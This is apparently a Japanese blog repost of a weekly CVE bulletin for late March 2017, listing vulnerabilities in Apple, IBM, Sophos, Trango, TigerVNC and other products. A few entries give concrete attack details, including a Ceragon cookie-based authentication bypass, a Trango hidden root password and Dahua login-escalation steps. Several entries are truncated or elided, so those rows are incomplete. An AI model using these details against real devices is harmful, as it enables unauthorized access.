Primary
Vendor -- Product |
Description
|
Published
|
CVSS Score
|
Source & Patch Info
|
adobe -- acrobat_reader
|
Adobe Acrobat Reader versions 15.020.20042 and earlier, 15.006.30244 and earlier, 11.0.18 and earlier have an exploitable memory corruption vulnerability in the rendering engine. Successful exploitation could lead to arbitrary code execution.
|
2017-03-31
|
not yet calculated
| |
adobe -- acrobat_reader
|
Adobe Acrobat Reader versions 15.020.20042 and earlier, 15.006.30244 and earlier, 11.0.18 and earlier have an exploitable buffer overflow vulnerability in the JPEG2000 parser. Successful exploitation could lead to information disclosure.
|
2017-03-31
|
not yet calculated
| |
apache -- ambari
|
Custom commands may be executed on Ambari Agent (2.4.x, before 2.4.2) hosts without authorization, leading to unauthorized access to operations that may affect the underlying system. Such operations are invoked by the Ambari Agent process on Ambari Agent hosts, as the user executing the Ambari Agent process.
|
2017-03-28
|
not yet calculated
| |
apple -- ios
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. The issue involves the "Phone" component. It allows attackers to trigger telephone calls to arbitrary numbers via a third-party app.
|
2017-04-01
|
not yet calculated
| |
apple -- ios
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. The issue involves the "iTunes Store" component. It allows man-in-the-middle attackers to modify the client-server data stream to iTunes sandbox web services by leveraging use of cleartext HTTP.
|
2017-04-01
|
not yet calculated
| |
apple -- ios
|
他にも多数
|
2017-04-01
|
not yet calculated
| |
apple -- macos
|
An issue was discovered in certain Apple products. macOS before 10.12.4 is affected. The issue involves the "Printing" component. A format-string vulnerability allows remote attackers to execute arbitrary code via a crafted ipp: or ipps: URL.
|
2017-04-01
|
not yet calculated
| |
apple -- macos_server
|
An issue was discovered in certain Apple products. macOS Server before 5.3 is affected. The issue involves the "Wiki Server" component. It allows remote attackers to enumerate user accounts via unspecified vectors.
|
2017-04-01
|
not yet calculated
| |
apple -- macos
|
他に25件ほど。省略
|
2017-04-01
|
not yet calculated
| |
apple -- safari
|
An issue was discovered in certain Apple products. Safari before 10.1 is affected. The issue involves the "Safari Login AutoFill" component. It allows local users to obtain access to locked keychain items via unspecified vectors.
|
2017-04-01
|
not yet calculated
| |
apple -- safari
|
An issue was discovered in certain Apple products. Safari before 10.1 is affected. The issue involves the "WebKit" component. It allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted app.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
An issue was discovered in certain Apple products. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. The issue involves cleartext client-certificate transmission in the "APNs Server" component. It allows man-in-the-middle attackers to track users via correlation with this certificate.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
他にもろもろ数十件、省略
|
2017-04-01
|
not yet calculated
| |
auromeera -- emli_portal
|
HTTP Exploit in eMLi Portal in AuroMeera Technometrix Pvt. Ltd. eMLi allows an Attacker to View Restricted Information or (even more seriously) execute powerful commands on the web server which can lead to a full compromise of the system via Directory Path Traversal, as demonstrated by reading core-emli/Storage. The affected versions are eMLi School Management 1.0, eMLi College Campus Management 1.0, and eMLi University Management 1.0.
|
2017-03-29
|
not yet calculated
| |
bubblewrap -- bubblewrap
|
When executing a program via the bubblewrap sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox.
|
2017-03-29
|
not yet calculated
| |
ceragon -- fibeair
|
In the GUI of Ceragon FibeAir IP-10 (before 7.2.0) devices, a remote attacker can bypass authentication by adding an ALBATROSS cookie with the value 0-4-11 to their browser.
|
2017-03-30
|
not yet calculated
| |
citymont_symetrie -- citymont_symetrie
|
citymont/symetrie v.0.9.6 is vulnerable to a reflected XSS in symetrie-master/app/commands/
|
2017-03-31
|
not yet calculated
| |
dahua -- ip_camera
|
Dahua IP Camera devices 3.200.0001.6 can be exploited via these steps: 1. Use the default low-privilege credentials to list all users via a request to a certain URI. 2. Login to the IP camera with admin credentials so as to obtain full control of the target IP camera. During exploitation, the first JSON object encountered has a "Component error: login challenge!" message. The second JSON object encountered has a result indicating a successful admin login.
|
2017-03-30
|
not yet calculated
| |
emc -- isilon_onefs
|
EMC Isilon OneFS is affected by a path traversal vulnerability that may potentially be exploited by attackers to compromise the affected system. Affected versions are 7.1.0 - 7.1.1.10, 7.2.0 - 7.2.1.3, and 8.0.0 - 8.0.0.1.
|
2017-03-29
|
not yet calculated
| |
emc -- rsa_archer_security_
|
EMC RSA Archer Security Operations Management with RSA Unified Collector Framework versions prior to 1.3.1.52 contain a sensitive information disclosure vulnerability that could potentially be exploited by malicious users to compromise an affected system.
|
2017-03-29
|
not yet calculated
| |
fortinet -- fortigate
|
Long lived sessions in Fortinet FortiGate devices with FortiOS 5.x before 5.4.0 could violate a security policy during IPS signature updates when the FortiGate's IPSengine is configured in flow mode. All FortiGate versions with IPS configured in proxy mode (the default mode) are not affected.
|
2017-03-30
|
not yet calculated
| |
fortinet -- fortios
|
A read-only administrator on Fortinet devices with FortiOS 5.2.x before 5.2.10 GA and 5.4.x before 5.4.2 GA may have access to read-write administrators password hashes (not including super-admins) stored on the appliance via the webui REST API, and may therefore be able to crack them.
|
2017-03-30
|
not yet calculated
| |
gitlab -- gitlab
|
Multiple versions of GitLab expose a dangerous method to any authenticated user that could lead to the deletion of all Issue and MergeRequest objects on a GitLab instance. For GitLab instances with publicly available projects this vulnerability could be exploited by an unauthenticated user. A fix was included in versions 8.14.3, 8.13.8, and 8.12.11, which were released on December 5th 2016 at 3:59 PST. The GitLab versions vulnerable to this are 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1, 8.14.2, and 8.14.2-ee.
|
2017-03-27
|
not yet calculated
| |
gitlab -- gitlab
|
Multiple versions of GitLab expose sensitive user credentials when assigning a user to an issue or merge request. A fix was included in versions 8.15.8, 8.16.7, and 8.17.4, which were released on March 20th 2017 at 23:59 UTC.
|
2017-03-27
|
not yet calculated
| |
hak5 -- wifi-pineapple
|
Hak5 WiFi Pineapple 2.0 through 2.3 uses predictable CSRF tokens.
|
2017-03-31
|
not yet calculated
| |
hkdf -- hkdf
|
HKDF in cryptography before 1.5.2 returns an empty byte-string if used with a length less than algorithm.digest_size.
|
2017-03-27
|
not yet calculated
| |
honeywell -- intermec
|
Honeywell Intermec PM23, PM42, PM43, PC23, PC43, PD43, and PC42 industrial printers before 10.11.013310 and 10.12.x before 10.12.013309 have /usr/bin/lua installed setuid to the itadmin account, which allows local users to conduct a BusyBox jailbreak attack and obtain root privileges by overwriting the /etc/shadow file.
|
2017-03-29
|
not yet calculated
| |
ibm -- algorithmics_one-algo_risk_
|
IBM Algorithmics One-Algo Risk Application 4.9.1, 5.0, and 5.1.0 could allow a user to gain access to files in the local environment which should not be viewed by application users. IBM Reference #: 1999892.
|
2017-03-31
|
not yet calculated
| |
ibm -- curam_social_program_manager
|
IBM Curam Social Program Management 6.0 and 7.0 are vulnerable to a denial of service, caused by an XML External Entity Injection (XXE) error when processing XML data. A remote attacker could exploit this vulnerability to expose highly sensitive information or consume all available memory resources. IBM Reference #: 2000833.
|
2017-03-31
|
not yet calculated
| |
ibm -- inotes
|
IBM iNotes 8.5 and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1998824.
|
2017-03-31
|
not yet calculated
| |
ibm -- jazz_foundation
|
IBM Jazz Foundation is vulnerable to a denial of service, caused by an XML External Entity Injection (XXE) error when processing XML data. A remote attacker could exploit this vulnerability to expose highly sensitive information or consume all available memory resources. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- kenexa
|
IBM Kenexa LMS on Cloud 13.1, 13.2, 13.2.2, 13.2.3, 13.2.4 and 14.0.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1999483.
|
2017-03-31
|
not yet calculated
| |
ibm -- rational_quality_manager
|
IBM Rational Quality Manager (RQM) 4.0, 5.0, and 6.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- rational_quality_manager
|
IBM Rational Quality Manager 4.0, 5.0, and 6.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- rational_quality_manager
|
IBM Rational Quality Manager (RQM) 4.0, 5.0, and 6.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- sterling_order_management
|
IBM Sterling Order Management 9.2 - 9.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 2000943.
|
2017-03-31
|
not yet calculated
| |
ibm -- tririga
|
The IBM TRIRIGA Application Platform 3.3, 3,4, and 3,5 contain a vulnerability that could allow an authenticated user to execute Application actions they do not have access to. IBM Reference #: 2001083.
|
2017-03-31
|
not yet calculated
| |
illumos -- illumos
|
illumos smbsrv NULL pointer dereference allows system crash.
|
2017-03-31
|
not yet calculated
| |
illumos -- illumos
|
illumos osnet-incorporation bcopy() and bzero() implementations make signed instead of unsigned comparisons allowing a system crash.
|
2017-03-31
|
not yet calculated
| |
imagemagick -- imagemagick
|
Heap-based buffer overflow in ImageMagick allows remote attackers to have unspecified impact via a crafted xpm file.
|
2017-03-30
|
not yet calculated
| |
imagemagick -- imagemagick
|
・・・他にも20件ほど、省略・・・
|
2017-03-30
|
not yet calculated
| |
intel_security -- anti-virus_engine
|
Software Integrity Attacks vulnerability in Intel Security Anti-Virus Engine (AVE) 5200 through 5800 allows local users to bypass local security protection via a crafted input file.
|
2017-03-28
|
not yet calculated
| |
intel_security -- anti-virus_engine
|
Software Integrity Attacks vulnerability in Intel Security Anti-Virus Engine (AVE) 5200 through 5800 allows local attackers to bypass local security protection via a crafted input file.
|
2017-03-31
|
not yet calculated
| |
jensen_of_scandinavia -- air_link
|
Multiple stack buffer overflow vulnerabilities in Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to execute arbitrary code or crash the web service via the (1) ateFunc, (2) ateGain, (3) ateTxCount, (4) ateChan, (5) ateRate, (6) ateMacID, (7) e2pTxPower1, (8) e2pTxPower2, (9) e2pTxPower3, (10) e2pTxPower4, (11) e2pTxPower5, (12) e2pTxPower6, (13) e2pTxPower7, (14) e2pTx2Power1, (15) e2pTx2Power2, (16) e2pTx2Power3, (17) e2pTx2Power4, (18) e2pTx2Power5, (19) e2pTx2Power6, (20) e2pTx2Power7, (21) ateTxFreqOffset, (22) ateMode, (23) ateBW, (24) ateAntenna, (25) e2pTxFreqOffset, (26) e2pTxPwDeltaB, (27) e2pTxPwDeltaG, (28) e2pTxPwDeltaMix, (29) e2pTxPwDeltaN, and (30) readE2P parameters of the /goform/formWlanMP endpoint.
|
2017-03-26
|
not yet calculated
| |
linux -- linux_kernel
|
Blkid in util-linux before 2.26rc-1 allows local users to execute arbitrary code.
|
2017-03-31
|
not yet calculated
| |
linux -- linux_kernel
|
Use-after-free vulnerability in fs/crypto/ in the Linux kernel before 4.10.7 allows local users to cause a denial of service (NULL pointer dereference) or possibly gain privileges by revoking keyring keys being used for ext4, f2fs, or ubifs encryption, causing cryptographic transform objects to be freed prematurely.
|
2017-03-31
|
not yet calculated
| |
linux -- linux_kernel
|
2017-03-31
|
not yet calculated
| ||
magmi -- magmi
|
A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/
|
2017-03-31
|
not yet calculated
| |
mantisbt -- configuration_report
|
A cross-site scripting (XSS) vulnerability in the MantisBT Configuration Report page (adm_config_report.php) allows remote attackers to inject arbitrary code (if CSP settings permit it) through a crafted 'config_option' parameter. This is fixed in 1.3.9, 2.1.3, and 2.2.3.
|
2017-03-31
|
not yet calculated
| |
mantisbt -- configuration_report
|
A cross-site scripting (XSS) vulnerability in the MantisBT Configuration Report page (adm_config_report.php) allows remote attackers to inject arbitrary code through a crafted 'action' parameter. This is fixed in 1.3.8, 2.1.2, and 2.2.2.
|
2017-03-31
|
not yet calculated
| |
mantisbt -- move_attachments
|
A cross-site scripting (XSS) vulnerability in the MantisBT Move Attachments page (move_attachments_page.php, part of admin tools) allows remote attackers to inject arbitrary code through a crafted 'type' parameter, if Content Security Protection (CSP) settings allows it. This is fixed in 1.3.9, 2.1.3, and 2.2.3. Note that this vulnerability is not exploitable if the admin tools directory is removed, as recommended in the "Post-installation and upgrade tasks" of the MantisBT Admin Guide. A reminder to do so is also displayed on the login page.
|
2017-03-31
|
not yet calculated
| |
mikrotik -- mikrotik
|
A vulnerability in the network stack of MikroTik Version 6.38.5 released 2017-03-09 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of TCP RST packets, preventing the affected router from accepting new TCP connections.
|
2017-03-29
|
not yet calculated
| |
multi-router_looking_glass -- multi-router_looking_glass
|
fastping.c in MRLG (aka Multi-Router Looking Glass) before 5.5.0 allows remote attackers to cause an arbitrary memory write and memory corruption.
|
2017-03-31
|
not yet calculated
| |
mxit -- mxit
|
The Mxit protocol uses weak encryption when encrypting user passwords, which might allow attackers to (1) decrypt hashed passwords by leveraging knowledge of client registration codes or (2) gain login access by eavesdropping on login messages and re-using the hashed passwords.
|
2017-03-29
|
not yet calculated
| |
nagios -- nagios
|
Cross-site scripting (XSS) vulnerability in Nagios.
|
2017-03-31
|
not yet calculated
| |
national_instruments -- labview_2016
|
An exploitable memory corruption vulnerability exists in the LvVarientUnflatten functionality of LabVIEW 2016 version 16.0.0.49152. A specially crafted VI file can cause a user controlled value to be used as a loop terminator resulting in internal heap corruption. An attacker controlled VI file can be used to trigger this vulnerability, exploitation could lead to remote code execution.
|
2017-03-31
|
not yet calculated
| |
netiq -- sentinel_server
|
A vulnerability was discovered in NetIQ Sentinel Server 8.0 before 8.0.1 that may allow leakage of information (account enumeration).
|
2017-03-30
|
not yet calculated
| |
netiq -- sentinel_server
|
A vulnerability was discovered in NetIQ Sentinel Server 8.0 before 8.0.1 that may allow remote denial of service.
|
2017-03-30
|
not yet calculated
| |
oci-register-machine -- oci-register-machine
|
The machinectl command in oci-register-machine allows local users to list running containers and possibly obtain sensitive information by running that command.
|
2017-03-29
|
not yet calculated
| |
open-exchange --appsuite
|
Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite backend before 7.6.2-rev59, 7.8.0 before 7.8.0-rev38, 7.8.2 before 7.8.2-rev8; AppSuite frontend before 7.6.2-rev47, 7.8.0 before 7.8.0-rev30, and 7.8.2 before 7.8.2-rev8; Office Web before 7.6.2-rev16, 7.8.0 before 7.8.0-rev10, and 7.8.2 before 7.8.2-rev5; and Documentconverter-API before 7.8.2-rev5 allows remote attackers to inject arbitrary web script or HTML.
Ref:
・ExchangeライクなOSSグループウエア「Open-
|
2017-03-29
|
not yet calculated
| |
open_eclass -- open_eclass
|
Multiple Cross-Site Scripting (XSS) were discovered in 'openeclass Release_3.5.4'. The vulnerabilities exist due to insufficient filtration of user-supplied data (meeting_id, user) passed to the 'openeclass-master/modules/tc/
|
2017-03-31
|
not yet calculated
| |
openstack -- glance
|
The image signature algorithm in OpenStack Glance 11.0.0 allows remote attackers to bypass the signature verification process via a crafted image, which triggers an MD5 collision.
|
2017-03-29
|
not yet calculated
| |
pixie -- pixie
|
Pixie 1.0.4 allows an admin/index.php s=login&m= XSS attack.
|
2017-03-31
|
not yet calculated
| |
pixie -- pixie
|
Pixie 1.0.4 allows an admin/index.php s=settings&x= XSS attack.
Pixie 1.0.4 allows an admin/index.php s=publish&m=dynamic&x= XSS attack.
Pixie 1.0.4 allows an admin/index.php s=publish&m=module&x= XSS attack.
Pixie 1.0.4 allows an admin/index.php s=publish&m=static&x= XSS attack.
|
2017-03-31
|
not yet calculated
| |
rancher_labs -- rancher_server
|
Rancher Labs rancher server 1.2.0+ is vulnerable to authenticated users disabling access control via an API call. This is fixed in versions rancher/server:v1.2.4, rancher/server:v1.3.5, rancher/server:v1.4.3, and rancher/server:v1.5.3.
|
2017-03-28
|
not yet calculated
| |
ruby -- ruby
|
DL::dlopen in Ruby 1.8, 1.9.0, 1.9.2, 1.9.3, 2.0.0 before patchlevel 648, and 2.1 before 2.1.8 opens libraries with tainted names.
|
2017-03-29
|
not yet calculated
| |
samsung -- galaxy
|
GALAXY Apps (aka Samsung Apps, Samsung Updates, or com.sec.android.app.
|
2017-03-27
|
not yet calculated
| |
samsung -- samsung_account
|
Samsung Account (AKA com.osp.app.signin) before 1.6.0069 and 2.x before 2.1.0069 allows man-in-the-middle attackers to obtain sensitive information and execute arbitrary code.
|
2017-03-27
|
not yet calculated
| |
siklu -- etherhaul
|
Siklu EtherHaul devices before 7.4.0 are vulnerable to a remote command execution (RCE) vulnerability. This vulnerability allows a remote attacker to execute commands and retrieve information such as usernames and plaintext passwords from the device with no authentication.
|
2017-03-30
|
not yet calculated
| |
siklu -- etherhaul
|
Siklu EtherHaul radios before 3.7.1 and 6.x before 6.9.0 have a built-in, hidden root account, with an unchangeable password that is the same across all devices. This account is accessible via both SSH and the device's web interface and grants access to the underlying embedded Linux OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
snoopy -- snoopy
|
The _httpsrequest function in Snoopy allows remote attackers to execute arbitrary commands. NOTE: this issue exists dues to an incomplete fix for CVE-2008-4796.
|
2017-03-31
|
not yet calculated
| |
socialnetwork -- socialnetwork
|
A Cross-Site Scripting (XSS) was discovered in 'SocialNetwork v1.2.1'. The vulnerability exists due to insufficient filtration of user-supplied data (mail) passed to the 'SocialNetwork-andrea/app/
|
2017-03-31
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, Session Fixation could occur, aka NSWA-1310.
|
2017-03-30
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's configuration utilities for adding (and detecting) Active Directory servers was vulnerable to remote command injection, aka NSWA-1314.
|
2017-03-30
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's interface responsible for generating reports was vulnerable to remote command injection via functions, aka NSWA-1304.
|
2017-03-30
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's interface responsible for generating reports was vulnerable to remote command injection via the token parameter, aka NSWA-1303.
|
2017-03-30
|
not yet calculated
| |
sync_breeze -- enterprise_client
|
A buffer overflow vulnerability in Import Command in Sync Breeze Enterprise Client 9.5.16, Disk Sorter Enterprise Client 9.5.12, and DiskBoss Enterprise Client 7.8.16 allows attackers to execute arbitrary code via a crafted XML file containing a long name attribute of a classify element.
|
2017-03-29
|
not yet calculated
| |
thefirstquestion_
|
TheFirstQuestion/
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (SSecurityVeNCrypt.cxx SSecurityVeNCrypt::
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (VNCSConnectionST.cxx VNCSConnectionST::fence), an authenticated client can cause a double free, leading to denial of service or potentially code execution.
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (SMsgReader.cxx SMsgReader::readClientCutText)
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (CConnection.cxx CConnection::CConnection), an unauthenticated client can cause a small memory leak in the server.
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (SSecurityPlain.cxx SSecurityPlain::processMsg), unauthenticated users can crash the server by sending long usernames.
|
2017-03-31
|
not yet calculated
| |
trango -- altum_ac600
|
Trango Altum AC600 devices have a built-in, hidden root account, with a default password of abcd1234. This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
trango -- trango
|
Trango Apex <= 2.1.1, ApexLynx < 2.0, ApexOrion < 2.0, ApexPlus <= 3.2.0, Giga <= 2.6.1, GigaLynx < 2.0, GigaOrion < 2.0, GigaPlus <= 3.2.3, GigaPro <= 1.4.1, StrataLink < 3.0, and StrataPro devices have a built-in, hidden root account, with a default password that was once stored in cleartext within a software update package on a Trango FTP server. This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
trango -- trango
|
Trango ApexLynx 2.0, ApexOrion 2.0, GigaLynx 2.0, GigaOrion 2.0, and StrataLink 3.0 devices have a built-in, hidden root account, with a default password for which the MD5 hash value is public (but the cleartext value is perhaps not yet public). This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
trend_micro -- enterprise_mobile_security_
|
There is Missing SSL Certificate Validation in the Trend Micro Enterprise Mobile Security Android Application before 9.7.1193, aka VRTS-398.
|
2017-03-30
|
not yet calculated
| |
ubuntu -- dmcrypt-get-device
|
dmcrypt-get-device, as shipped in the eject package of Debian and Ubuntu, does not check the return value of the (1) setuid or (2) setgid function, which might cause dmcrypt-get-device to execute code, which was intended to run as an unprivileged user, as root. This affects eject through 2.1.5+deb1+cvs20081104-13.1 on Debian, eject before 2.1.5+deb1+cvs20081104-13.
|
2017-03-27
|
not yet calculated
| |
vlc -- vlc
|
VideoLAN VLC media player before 2.1.5 allows remote attackers to execute arbitrary code or cause a denial of service.
|
2017-03-28
|
not yet calculated
| |
wallacepos -- wallacepos
|
A Cross-Site Scripting (XSS) was discovered in 'wallacepos v1.4.1'. The vulnerability exists due to insufficient filtration of user-supplied data (token) passed to the 'wallacepos-master/myaccount/
|
2017-03-31
|
not yet calculated
| |
xoops -- xoops
|
SQL injection vulnerability in XOOPS 2.5.7.2 and other versions before 2.5.8.1 allows remote authenticated administrators to execute arbitrary SQL commands via the url parameter to findusers.php. An example attack uses "into outfile" to create a backdoor program.
|
2017-03-30
|
not yet calculated
| |
zimbra -- zimbra_collaboration_suite
|
Zimbra Collaboration Suite (ZCS) before 8.7.4 allows remote attackers to conduct XML External Entity (XXE) attacks.
|
2017-03-29
|
not yet calculated
| |
zulip -- zulip
|
An error in the implementation of an autosubscribe feature in the check_stream_exists route of the Zulip group chat application server before 1.4.3 allowed an authenticated user to subscribe to a private stream that should have required an invitation from an existing member to join. The issue affects all previously released versions of the Zulip server.
|
2017-03-27
|
not yet calculated
|
Apr 7, 2017
3/27週のCVE ... Severity Not Yet Assigned
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment